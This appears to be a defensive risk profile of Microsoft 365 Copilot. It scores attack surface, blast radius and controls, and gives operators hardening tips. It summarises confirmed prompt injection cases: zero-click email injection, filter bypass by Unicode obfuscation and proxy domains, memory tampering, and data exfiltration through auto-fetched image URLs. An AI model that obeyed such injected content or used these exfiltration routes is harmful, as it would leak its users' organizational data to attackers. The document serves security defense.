1 Key Risks
The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Confirmed zero-click prompt injection chains expose the full organizational data estate through credential-equivalent access, with output guardrails and monitoring absent at the default configuration.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Confirmed exploitation chains against partial defenses produce a moderate composite score anchored by credential-equivalent blast radius and bypassable input filtering.
Operators deploying this agent inherit confirmed data exfiltration paths that reach the full organizational data estate despite partial input filtering, placing the risk profile where attack capability outpaces defense maturity.
The four metrics below capture the gap between the agent's broad data access and its incomplete default-on protection against confirmed attack patterns.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 4.56 | Moderate composite risk driven by confirmed exploitation against partially defended credential-equivalent access. |
| Blast Radius | 5.38 / 10 | File system, network, and credential factors at maximum reflect full organizational data inheritance. |
| Attack Surface | 5.72 / 10 | Three surfaces at adjusted ceiling from confirmed zero-click injection and data exfiltration vulnerabilities. |
| Defense Controls | 5 / 15 | Input filtering and execution isolation partially present; output guardrails confirmed bypassable against targeted evasion. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. Three attack surfaces reach adjusted ceiling driven by confirmed zero-click prompt injection and auto-fetch exfiltration chains that bypassed deployed input and output filters.
Scores reflect base architectural exposure plus evidence penalties from confirmed agent-specific vulnerabilities and demonstrated exploitation research.
Each row measures how attacker-controlled input reaches the reasoning loop through that channel, with penalties applied where confirmed exploitation exists.
| Surface | Score | Comments |
|---|---|---|
| User Input | 5 / 4 | Direct prompt channel accepts arbitrary text; indirect injection via crafted email demonstrated zero-click bypass of cross-prompt injection filters [1]. A separate validation flaw confirmed unauthorized network-based information disclosure without authentication [2]. Both vulnerabilities received critical severity ratings and were patched server-side. |
| External Data | 5 / 4 | Retrieval-augmented generation ingests email, documents, and web content from organizational storage without per-item validation. Confirmed exploitation demonstrated that attacker-controlled email content triggers automatic tool invocation [6] and data staging without user interaction [1] [5]. The grounding pipeline processes external content identically to trusted internal documents. |
| Memory | 3 / 4 | Declarative memory stores durable facts across sessions. Confirmed exploitation demonstrated that prompt injection can add and delete memory entries [3] [7], enabling persistent influence over future responses. The attack chain showed how manipulated memory enables long-term data exfiltration through CSS-based side channels. |
| Reasoning | 2 / 4 | The reasoning layer operates on mixed trusted and untrusted context without documented separation between system instructions and grounded content [9]. No public red-team of reasoning-layer isolation has been published. The base exposure reflects standard LLM context-mixing risk without confirmed agent-specific exploitation. |
| Planning | 1 / 4 | Single-turn interaction model without multi-step autonomous planning in the default configuration [9]. The agent does not decompose tasks into sub-goals or execute multi-step chains without explicit user direction, limiting the planning surface to direct request-response cycles. |
| Tool Execution | 1 / 4 | Tools are limited to organizational API calls scoped to existing user permissions [9]. No shell, browser, or code execution sandbox is exposed in the default configuration. The constrained tool surface restricts exploitation to data access rather than arbitrary code execution. |
| Orchestration | 2 / 4 | Internal orchestration coordinates retrieval, grounding, and response generation across organizational API endpoints [10]. The orchestration layer is not operator-configurable and runs within vendor-hosted infrastructure, limiting attacker manipulation to indirect influence through grounded content. |
| Inter-Agent | 2 / 4 | The agent connects to plugins and third-party connectors that extend its action surface [15]. Plugin interactions inherit the user's authentication context without additional per-plugin consent gates. Independent research demonstrated that these connections enable remote execution chains triggered by email [8]. |
| Output Processing | 5 / 4 | Markdown rendering with auto-fetched image URLs enables side-channel exfiltration [16]. A confirmed exploit [1] bypassed link redaction through Unicode manipulation and proxy domain routing. A separate vulnerability [4] confirmed information disclosure through improper neutralization of output consumed by downstream components. |
| Configuration | 2 / 4 | Tenant administrators control availability and data access policies through a centralized admin center [9]. Individual user-level security configuration is limited; default permissions inherit the user's full organizational API scope without per-resource restriction. |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. This agent processes attacker-controlled email and document content, accesses the authenticated user's full organizational data estate including files and credentials, and transmits bytes externally through auto-fetched URLs and plugin HTTP calls on its default configuration.
Microsoft 365 Copilot exhibits all three of these conditions in its documented default configuration:
- Untrusted input — Untrusted input confirmed: attacker-controlled email content triggers processing without user interaction, as demonstrated by the zero-click indirect prompt injection chain that bypassed deployed cross-prompt injection filters [1].
- Sensitive data — Sensitive data confirmed: the agent accesses the full organizational data estate through the authenticated user's permission scope, including email, files, calendar, and credentials, without per-resource classification gates on grounding [9].
- External egress — External egress confirmed: auto-fetched markdown image URLs and plugin HTTP calls transmit bytes outside the operator's trust boundary, as demonstrated by data exfiltration to an attacker-controlled server through a proxy domain [1].
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. File system, network, and credential access factors at maximum reflect that compromise of the agent's reasoning grants access equivalent to the authenticated user's full organizational permissions.
Scores reflect the damage an attacker achieves after successfully injecting into the agent's context, measured by the resources reachable from that position.
Each factor measures the scope of organizational resources an attacker can reach or exfiltrate through a successfully compromised agent session.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 1 / 4 | No code execution sandbox exposed in the default configuration [9]. The agent generates text responses and invokes organizational API calls but does not execute arbitrary code, limiting post-compromise actions to data access and messaging. |
| File system access | 3 / 4 | Full read access to organizational file storage within the user's permission scope. Confirmed exploitation [1] demonstrated exfiltration of internal document content through the auto-fetch side channel without additional authentication or user approval. |
| Network access | 3 / 4 | Outbound network access through auto-fetched image URLs and plugin HTTP calls [14]. Confirmed exploitation [1] demonstrated data transmission to an external server through a proxy domain that bypassed content security policy restrictions on the default configuration. |
| Credential access | 3 / 4 | The agent operates with the authenticated user's full OAuth token granting access equivalent to the user's own credential across email, files, calendar, and messaging [13]. Confirmed exploitation [1] accessed content through these delegated scopes without re-authentication. |
| Autonomous action | 2 / 4 | The agent can draft messages, create events, and modify files within the user's scope [6]. Actions that send outbound communications require user confirmation in the default configuration, though indirect prompt injection via malicious email demonstrated automatic tool invocation bypassing this gate. |
| Deployment access | 1 / 4 | No deployment, infrastructure management, or CI/CD capabilities in the default configuration [9]. The agent operates within the productivity boundary without access to resource management or code deployment pipelines. |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Input filtering and execution isolation are partially present but confirmed bypassable, while output guardrails and monitoring have nothing effective in place against demonstrated attack vectors.
Scores reflect what the default configuration provides without operator customization, using an inverted scale where higher values indicate stronger protection.
Each component measures whether a specific defensive control operates by default and whether confirmed exploitation has demonstrated its bypass.
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 2 / 3 | Prompt Shields and cross-prompt injection classifiers are deployed as default-on input filters [10]. However, confirmed exploitation [1] demonstrated complete bypass through Unicode manipulation, indicating the control exists but fails against targeted evasion by a motivated attacker with knowledge of the filter architecture. |
| Execution Isolation | 2 / 3 | Server-side hosted execution with tenant-scoped compute isolation is documented in vendor architecture materials [9] [11]. No public third-party audit of the isolation boundary exists, and the operator cannot configure sandbox parameters or inspect execution logs for the grounding pipeline. |
| Action Controls | 1 / 3 | Send-action confirmation gates exist for outbound email in the default configuration. Independent research [6] demonstrated tool invocation and data staging without user approval through indirect prompt injection, indicating the control is partially bypassable. |
| Output Guardrails | 0 / 3 | Link redaction is intended to prevent data exfiltration via URLs in responses. The EchoLeak chain [1] defeated this control entirely through Unicode obfuscation and proxy domain routing, proving no effective default-on output sanitization exists against targeted evasion vectors. |
| Monitoring | 0 / 3 | Purview Unified Audit Log captures interactions for compliance review. No documented default-on anomaly detection for prompt injection patterns or data exfiltration attempts within sessions exists [12]. Operators must configure SIEM integration and alerting rules manually. |
6 Hardening Tips
Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators can materially reduce the confirmed exploitation surface by restricting data access scope, enforcing output controls, and enabling detection capabilities that are available but not active by default.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy Restrict agent access to sensitivity-labeled content using information protection policies, preventing grounding on documents above a configured classification tier — counters the unrestricted retrieval-augmented generation that enabled organizational data exfiltration.
- Configuration Deploy data loss prevention policies scoped to the agent location to block responses grounded on content matching sensitive information types defined by the organization — counters the absence of per-item classification gates on ingested content.
- Engineering Implement conditional access policies requiring compliant devices and named locations for agent access, reducing the attack surface for credential-based injection delivery — counters the zero-click email delivery vector demonstrated in confirmed exploitation.
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy Scope agent licensing to security groups with minimum-necessary organizational API permissions rather than deploying organization-wide — counters the full permission inheritance that grants credential-equivalent access to every licensed user.
- Configuration Enable audit log forwarding to a SIEM with alerts on anomalous interaction patterns including high-volume file access and unusual time-of-day usage — counters the absence of default-on execution monitoring for injection indicators.
- Engineering Review and restrict third-party plugin deployments through integrated apps management controls — counters the extended action surface from unvetted connector connections that inherit user authentication context.
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy Disable agent email-send capabilities for users who do not require AI-assisted outbound communication through transport rule enforcement — counters the demonstrated tool invocation bypass that stages exfiltration via message drafts.
- Configuration Restrict agent file-write permissions using site-level access policies limiting which document libraries the agent can modify — counters the autonomous file modification capability within the user's full organizational scope.
- Engineering Deploy cloud application session policies that block agent-initiated downloads of documents matching data loss prevention patterns — counters the file system blast radius from credential-equivalent organizational API access.
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy Configure content safety policies to restrict agent rendering of external URLs and image content in responses — counters the auto-fetch exfiltration channel exploited through the confirmed zero-click attack chain.
- Configuration Deploy network-layer URL filtering blocking outbound requests to non-allowlisted domains from service endpoints — counters the proxy domain exfiltration path that bypassed content security policy restrictions.
- Engineering Enable communication compliance policies monitoring agent output for patterns matching known exfiltration encodings including Unicode smuggling and encoded data in URLs — counters the ASCII smuggling staging technique demonstrated by independent researchers.
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy Forward unified audit log agent events to a SIEM with correlation rules detecting injection indicators including repeated grounding failures and high-frequency file access within single sessions — counters the absent default anomaly detection.
- Configuration Deploy analytics rules specifically targeting agent interaction anomalies using dedicated telemetry tables — counters the operator blind spot on real-time injection detection within legitimate user sessions.
- Engineering Enable insider risk management signals for agent sessions exhibiting data exfiltration patterns including sequential access to classified documents followed by outbound communication — counters the gap between compliance logging and active threat detection.
7 References
The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.
Selected Vulnerabilities
- CVE-2025-32711 EchoLeak zero-click prompt injection in M365 Copilot CVSS 9.3. Crafted email triggered data exfiltration via auto-fetched image URLs bypassing XPIA filters. Patched server-side May 2025.
- CVE-2026-24307 Improper input validation in M365 Copilot CVSS 9.3. Unauthorized attacker could disclose information over network without authentication. Patched server-side January 2026.
- CVE-2026-24299 Command injection in M365 Copilot CVSS 5.3. Demonstrated at DEF CON as Copirate 365 including memory manipulation and persistent data exfiltration. Patched March 2026.
- CVE-2026-26129 Critical information disclosure in M365 Copilot Business Chat via improper neutralization of output used by downstream component CVSS 7.5. Patched May 2026.
Selected Research
- EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit Aim Security research demonstrating the full EchoLeak attack chain against M365 Copilot including XPIA bypass and auto-fetch exfiltration.
- Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information Rehberger demonstrated prompt injection via malicious email triggering automatic tool invocation and ASCII smuggling for data exfiltration.
- Copirate 365 at DEF CON DEF CON Singapore presentation demonstrating memory manipulation and CSS-based data exfiltration and persistent theft chains in M365 Copilot.
- Living off Microsoft Copilot Bargury demonstrated remote Copilot execution via email-triggered search and exfiltration and DLP bypass using LOLCopilot offensive toolset at Black Hat USA 2024.
Vendor Documentation
- Security for Microsoft 365 Copilot Primary vendor security documentation describing identity controls and tenant isolation and data governance and Entra ID integration architecture.
- How Microsoft defends against indirect prompt injection attacks MSRC blog describing Prompt Shields and TaskTracker internal-state analysis and FIDES information-flow control and the LLMail-Inject challenge.
- Data Privacy and Security for Microsoft 365 Copilot Documents permissions model and prompt injection blocking and encryption at rest and in transit and compliance commitments.
- Microsoft Purview DLP for Microsoft 365 Copilot Documents how DLP policies can block Copilot from responding or grounding when prompts contain sensitive information types.
Other Sources
- Critical Microsoft 365 Copilot Vulnerabilities Expose Sensitive Information Security news coverage of May 2026 triple-CVE disclosure documenting critical information disclosure vulnerabilities patched server-side.
- EchoLeak AI Attack Enabled Theft of Sensitive Data via Microsoft 365 Copilot SecurityWeek coverage providing operator-facing analysis of CVE-2025-32711 disclosure including attack mechanics and scoped data access.
- How to Weaponize Microsoft Copilot for Cyberattackers Dark Reading coverage of Black Hat USA 2024 LOLCopilot demonstrations including remote Copilot execution and post-compromise spear-phishing.
- EchoLeak: A Reminder That AI Agent Risks Are Here to Stay Zenity Labs analysis connecting EchoLeak to broader M365 Copilot attack surface and explaining why underlying injection issues persist.